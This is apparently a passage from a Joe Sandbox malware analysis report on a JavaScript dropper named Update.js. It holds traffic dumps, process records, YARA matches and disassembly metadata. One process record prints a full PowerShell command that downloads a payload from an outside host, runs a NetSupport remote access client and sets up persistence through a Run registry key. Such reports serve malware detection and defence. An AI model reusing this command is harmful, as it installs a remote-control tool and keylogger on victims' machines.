                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 66 63 52 64 4e 73 30 4a 2f 48 4a 54 76 6e 75 31 5a 36 77 32 6a 6f 31 7a 59 6b 43 72 6e 6b 75 4d 70 79 72 34 37 6d 58 41 49 33 4a 55 78 73 4d 4d 2b 45 6e 57 64 77 4d 50 38 5a 59 66 75 4e 30 6a 4e 65 41 4f 57 44 2b 63 52 6f 47 4d 78 35 65 32 46 67 54 71 54 44 57 38 6f 74 4d 4a 6a 48 52 56 6f 37 53 68 76 4d 34 77 55 75 65 6d 55 65 56 75 36 6d 6f 36 37 42 53 6b 56 36 79 31 36 6f 5a 4b 7a 57 44 33 4f 35 39 30 4b 77 7a 4d 64 57 71 68 62 2f 74 57 51 69 36 43 59 38 4d 64 33 5a 77 6e 55 57 65 48 37 37 4b 49 41 45 76 6b 41 31 64 58 4e 69 56 7a 58 56 67 76 6c 4a 5a 4d 62 50 32 63 41 57 73 4d 35 43 79 6e 2f 64 76 34 74 71 79 6a 59 6b 6d 75 70 52 45 6a 70 62 7a 46 69 6c 57 2f 32 30 71 7a 34 43 4c 2f 48 46 50 2f 47 4d 38 6f 65 55 32 6a 4b 50 6f 55 70 53 34 4a 4a 44 37
                                                                                                                                                  Data Ascii: fcRdNs0J/HJTvnu1Z6w2jo1zYkCrnkuMpyr47mXAI3JUxsMM+EnWdwMP8ZYfuN0jNeAOWD+cRoGMx5e2FgTqTDW8otMJjHRVo7ShvM4wUuemUeVu6mo67BSkV6y16oZKzWD3O590KwzMdWqhb/tWQi6CY8Md3ZwnUWeH77KIAEvkA1dXNiVzXVgvlJZMbP2cAWsM5Cyn/dv4tqyjYkmupREjpbzFilW/20qz4CL/HFP/GM8oeU2jKPoUpS4JJD7
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 70 4e 73 6b 45 77 43 73 6f 39 65 38 36 2f 33 68 35 64 50 57 79 39 6e 58 39 39 6d 64 75 67 2b 45 56 43 30 4e 67 67 66 56 6e 31 35 41 5a 7a 41 47 77 65 76 2f 37 6e 50 77 76 77 61 36 32 41 55 71 62 2b 6f 58 45 45 34 54 67 30 6c 76 7a 6c 30 64 69 45 67 50 79 73 6e 7a 79 58 50 7a 38 64 2b 66 50 7a 58 59 77 58 6c 52 64 6a 77 4d 77 74 4c 45 2f 4f 31 31 38 66 68 4d 79 68 73 57 72 6a 43 5a 31 32 76 64 78 68 47 78 47 45 35 66 63 50 6f 49 2f 52 33 51 4c 77 6d 68 32 61 63 61 55 38 36 57 58 6a 6d 4b 71 5a 39 44 67 5a 6e 39 52 2b 48 4d 73 49 79 34 6f 32 41 79 74 35 4d 73 73 63 57 77 44 55 74 63 2f 7a 62 6b 4e 52 67 69 44 4f 79 47 69 5a 6d 50 72 61 71 76 44 54 45 39 47 4d 36 68 38 6c 6e 62 70 32 42 72 43 6e 2f 52 6c 34 48 39 6d 57 74 43 55 6c 2f 4e 4a 55 4e 61 78 77 43
                                                                                                                                                  Data Ascii: pNskEwCso9e86/3h5dPWy9nX99mdug+EVC0NggfVn15AZzAGwev/7nPwvwa62AUqb+oXEE4Tg0lvzl0diEgPysnzyXPz8d+fPzXYwXlRdjwMwtLE/O118fhMyhsWrjCZ12vdxhGxGE5fcPoI/R3QLwmh2acaU86WXjmKqZ9DgZn9R+HMsIy4o2Ayt5MsscWwDUtc/zbkNRgiDOyGiZmPraqvDTE9GM6h8lnbp2BrCn/Rl4H9mWtCUl/NJUNaxwC
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 62 51 4d 34 2b 65 30 2b 69 5a 53 38 2b 70 39 4a 78 43 7a 32 78 36 5a 74 45 7a 6b 35 34 5a 39 45 79 6a 70 34 4f 65 64 6e 72 61 36 4c 6b 56 74 2b 73 6d 31 39 47 7a 6e 70 34 4e 39 48 79 59 6e 6f 2f 53 38 33 46 36 50 6b 46 50 32 74 36 62 2f 41 77 39 6e 36 58 6e 62 6e 6f 2b 54 38 38 39 39 48 79 42 6e 76 76 70 2b 51 6f 39 51 2f 52 38 6a 5a 36 48 36 58 6d 45 35 32 6e 47 35 7a 76 30 33 6b 37 50 6b 2f 54 73 6f 47 63 6e 50 52 6b 39 54 39 47 7a 69 35 37 64 39 49 7a 53 73 34 2b 65 4a 73 72 48 52 6b 38 37 50 52 33 30 64 4e 49 7a 6a 5a 34 5a 39 4d 79 6b 5a 78 59 39 73 2b 6b 35 68 5a 35 54 36 5a 6c 4c 7a 32 6e 30 7a 4b 4e 6e 41 54 32 66 70 4f 63 38 65 70 62 53 73 34 2b 65 55 58 70 32 30 37 4f 4c 6e 71 66 6f 79 65 6a 5a 53 63 38 4f 65 70 36 6b 5a 7a 75 76 4c 7a 32 50 30
                                                                                                                                                  Data Ascii: bQM4+e0+iZS8+p9JxCz2x6ZtEzk54Z9Eyjp4Oednra6LkVt+sm19Gznp4N9HyYno/S83F6PkFP2t6b/Aw9n6Xnbno+T8899HyBnvvp+Qo9Q/R8jZ6H6XmE52nG5zv03k7Pk/TsoGcnPRk9T9Gzi57d9IzSs4+eJsrHRk87PR30dNIzjZ4Z9MykZxY9s+k5hZ5T6ZlLz2n0zKNnAT2fpOc8epbSs4+eUXp207OLnqfoyejZSc8Oep6kZzuvLz2P0
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 63 36 2f 79 72 6c 58 30 6e 38 61 30 55 68 4e 68 4d 43 65 70 34 44 41 4a 44 72 4e 2f 58 47 62 46 5a 62 6a 62 6f 4d 46 58 45 79 71 4d 61 6e 69 77 72 57 39 6c 77 63 7a 53 74 34 4b 34 6d 59 55 48 63 66 70 64 61 75 67 37 52 58 56 4c 44 31 61 46 48 41 58 55 69 47 4a 74 4f 32 61 7a 51 41 48 66 49 73 45 32 35 4b 2f 2b 74 63 58 43 59 54 55 54 47 56 33 59 2f 35 4d 68 66 51 41 63 63 43 4e 64 39 55 6d 56 6f 4e 33 68 30 73 53 78 36 51 5a 50 56 39 39 46 74 4a 66 65 30 71 76 64 4f 72 30 32 6e 41 76 45 76 57 6d 76 52 47 6f 2b 37 36 4c 75 34 58 32 31 66 36 54 55 4d 31 4a 51 6f 48 57 2f 71 31 67 62 36 65 37 44 64 35 2b 66 69 70 61 6a 62 4d 51 6e 75 78 59 32 73 56 38 64 30 63 46 64 2b 53 64 58 46 31 56 54 4e 4d 4d 72 68 44 58 4c 31 67 4e 73 30 30 31 55 58 34 75 2b 73 77 6c
                                                                                                                                                  Data Ascii: c6/yrlX0n8a0UhNhMCep4DAJDrN/XGbFZbjboMFXEyqManiwrW9lwczSt4K4mYUHcfpdaug7RXVLD1aFHAXUiGJtO2azQAHfIsE25K/+tcXCYTUTGV3Y/5MhfQAccCNd9UmVoN3h0sSx6QZPV99FtJfe0qvdOr02nAvEvWmvRGo+76Lu4X21f6TUM1JQoHW/q1gb6e7Dd5+fipajbMQnuxY2sV8d0cFd+SdXF1VTNMMrhDXL1gNs001UX4u+swl


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:23:18
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                                                                                                                                  Imagebase:0x7ff7d1f60000
                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:09:23:38
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                                                                                                  Imagebase:0x7ff7582a0000
                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:09:23:39
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6684c0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:09:23:46
                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
                                                                                                                                                  Imagebase:0x440000
                                                                                                                                                  File size:103'824 bytes
                                                                                                                                                  MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 27%, ReversingLabs
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:false

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                    Total number of Limit Nodes:0

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00007FFECBB58B0A Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 132034935-0
                                                                                                                                                    • Opcode ID: bcaa199a5bbaa868dfd9935e1a527b2240f88413579c87127577db80bf76424f
                                                                                                                                                    • Instruction ID: 5fff2564f1b91e303f92cbd93fc463fc53ba47c7b8beb39dc6194749e406c942
                                                                                                                                                    • Opcode Fuzzy Hash: bcaa199a5bbaa868dfd9935e1a527b2240f88413579c87127577db80bf76424f
                                                                                                                                                    • Instruction Fuzzy Hash: ED319231918A1C9FDB18DF5C98496F97BE1FB99315F04422EE049D3252CB74A816CB81
                                                                                                                                                    Function 00007FFECBB57502 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 7638f5239412fac75c89b0802259ff8d2ecf06a1297f5bb603c51daf85a3c5cc
                                                                                                                                                    • Instruction ID: 4fc5615538299a25e64e4048f59d2af1f6c8b4f2ce8e270843e8a961933903a9
                                                                                                                                                    • Opcode Fuzzy Hash: 7638f5239412fac75c89b0802259ff8d2ecf06a1297f5bb603c51daf85a3c5cc
                                                                                                                                                    • Instruction Fuzzy Hash: 17215171908A1C9FDB58DF58D849AFABBE1FF55311F00422FD00AD3661DB74A806CB91
                                                                                                                                                    Function 00007FFECBB582CF Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 6ea384610235e6961984fdc741215f3e879a40b96cd47ebca7e6ea3ed647e436
                                                                                                                                                    • Instruction ID: 7495a56ca0c5f6dafc5f92bf00aa3a46266f6c842f65c18691b56a7c7ee8652a
                                                                                                                                                    • Opcode Fuzzy Hash: 6ea384610235e6961984fdc741215f3e879a40b96cd47ebca7e6ea3ed647e436
                                                                                                                                                    • Instruction Fuzzy Hash: 3C218031908A1C8FDB58DF98D849AEABBE1FF55311F00822FD009D3661CB74A805CB81
                                                                                                                                                    Function 00007FFECBB582B1 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1851284233.00007FFECBB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBB50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbb50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 1c978fe1423273da1d88fbdd3cae860ac59169c7a12b40a2bfbfe4748bb2aaf8
                                                                                                                                                    • Instruction ID: 82fef0fcc4e1e6968a5b08f4021295402ac3eab52fb0d75e71f086a832902dd9
                                                                                                                                                    • Opcode Fuzzy Hash: 1c978fe1423273da1d88fbdd3cae860ac59169c7a12b40a2bfbfe4748bb2aaf8
                                                                                                                                                    • Instruction Fuzzy Hash: 5E21A13190CB9C8FDB56DF68D8446A9BFF0FF1A311F04426BD049D3662CB65A845CB81
                                                                                                                                                    Function 00007FFECC4B4CEE Relevance: .3, Instructions: 264COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1902184315.00007FFECC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC4B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc4b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6c23a43cc279a114675589f3cf6e09abefe754b7112ee1f227b897dbf535c0b0
                                                                                                                                                    • Instruction ID: c0cfd0b1089a7a4a174f11ea26cdf9de3e15afc338e40f325e36b41f9b8a85b0
                                                                                                                                                    • Opcode Fuzzy Hash: 6c23a43cc279a114675589f3cf6e09abefe754b7112ee1f227b897dbf535c0b0
                                                                                                                                                    • Instruction Fuzzy Hash: 5F61CA3294DA8A0EE7199E2CAC510F5BBD4FF42334F04917EF4C9C35A2E919A883C340
                                                                                                                                                    Function 00007FFECC2C4510 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1892029858.00007FFECC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC2C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc2c0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 809f9f41ddb6d4567eb70bb45b60279ca44a9f3625338a5857a5243820ee60d7
                                                                                                                                                    • Instruction ID: c240c7fdf252c76d7d0c6f72f5fe5e001e24d03f7c9700097898fbe6755d5d5e
                                                                                                                                                    • Opcode Fuzzy Hash: 809f9f41ddb6d4567eb70bb45b60279ca44a9f3625338a5857a5243820ee60d7
                                                                                                                                                    • Instruction Fuzzy Hash: D731A430A48E8A4FEB98DA1DD45077277E1FF95350F5541B9E00DCBAA6CA2AEC86C740
                                                                                                                                                    Function 00007FFECBE508F1 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62cb96f19461b1774e7a891453b7b84c12607bd573fae75eac57b4bbe25cd9e5
                                                                                                                                                    • Instruction ID: 8826afd2ea93ad699615b8a386879e3c38e86b26012d604fd8e1ee43dd893380
                                                                                                                                                    • Opcode Fuzzy Hash: 62cb96f19461b1774e7a891453b7b84c12607bd573fae75eac57b4bbe25cd9e5
                                                                                                                                                    • Instruction Fuzzy Hash: F7F09622A1EE7E0FE2A6C61C18542B6A696EBD9621754017AE40FC32B6DD15D8068341
                                                                                                                                                    Function 00007FFECC2C45C1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1892029858.00007FFECC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC2C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc2c0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3461937d8d6837810908b1ce7f0caa3237d7e44ff8f1e385e4003976dcdaccf0
                                                                                                                                                    • Instruction ID: c3bbf60bc3e6e5a33cb0c393c309741c95ea194c39bebd44539e8709061d609d
                                                                                                                                                    • Opcode Fuzzy Hash: 3461937d8d6837810908b1ce7f0caa3237d7e44ff8f1e385e4003976dcdaccf0
                                                                                                                                                    • Instruction Fuzzy Hash: B2E08611B5CD5D0F95D4FE1D68415A9B3D1EB98210790467AE40EC2377DC2DA8858380
                                                                                                                                                    Function 00007FFECBE5379C Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 56046942cec950e40e44cfeeb6eae6ae8d569a66e90e0121a55bead31e70b07e
                                                                                                                                                    • Instruction ID: 89ff4037a22dc408d7d7eacffc71bb45661b78746486608653d91105e2bc3c02
                                                                                                                                                    • Opcode Fuzzy Hash: 56046942cec950e40e44cfeeb6eae6ae8d569a66e90e0121a55bead31e70b07e
                                                                                                                                                    • Instruction Fuzzy Hash: 40E03932E1C56D8FE781EF68E9499ABB3E0FF48610B6401B6F10ED3072CA29A854C700
                                                                                                                                                    Function 00007FFECBE5095A Relevance: .0, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9740a24ddd24f32460e05ab08550cd912397857eb9e32d3ded3eb837b04d12c8
                                                                                                                                                    • Instruction ID: d088691ecd444ccc79f0722fe9b52ad6a836e15a4fd640163f297c0d123eb20a
                                                                                                                                                    • Opcode Fuzzy Hash: 9740a24ddd24f32460e05ab08550cd912397857eb9e32d3ded3eb837b04d12c8
                                                                                                                                                    • Instruction Fuzzy Hash: 5ED01720B14E2E4EE39AAA2C0448232A0C2EFDD6027614839A40EC23BADC38D8468300
                                                                                                                                                    Function 00007FFECBE54B94 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 22600f3bdd673e14cbe327b0a26a654e8b1e7faca003dbc44b66fac3d8c4f548
                                                                                                                                                    • Instruction ID: c7094aaf551a9589b8168670061184f8c3300d77cfc1e93a7d189c2c0db9c9f4
                                                                                                                                                    • Opcode Fuzzy Hash: 22600f3bdd673e14cbe327b0a26a654e8b1e7faca003dbc44b66fac3d8c4f548
                                                                                                                                                    • Instruction Fuzzy Hash: E2D05E20B19A0F0AE7DD662C04753B9A0E2EF9C701F90407CA00EC63F7CC1CD8024340
                                                                                                                                                    Function 00007FFECBE51B47 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ba2ca107a8fce9585e6e7e57b644d569f1757fd296e83fda40c34ea170048432
                                                                                                                                                    • Instruction ID: 2a485003ae71d4b688fb8811997742d185807fe8e0445197e084c8b61370fede
                                                                                                                                                    • Opcode Fuzzy Hash: ba2ca107a8fce9585e6e7e57b644d569f1757fd296e83fda40c34ea170048432
                                                                                                                                                    • Instruction Fuzzy Hash: 72C04C22A49C2A0BA6A9AA5C74951A867C0D79867070502AAE459C2265D9180DC343C5
                                                                                                                                                    Function 00007FFECBE54BBC Relevance: .0, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1865946450.00007FFECBE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBE50000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbe50000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 61d8ca9af00243f8b25e2c005cb961682ddccdccddfabf7415bfdd8b159a190e
                                                                                                                                                    • Instruction ID: c601728ed86cc554180b8310b68bbbcd1d6768fbdfdc28553de14b5edfd49e42
                                                                                                                                                    • Opcode Fuzzy Hash: 61d8ca9af00243f8b25e2c005cb961682ddccdccddfabf7415bfdd8b159a190e
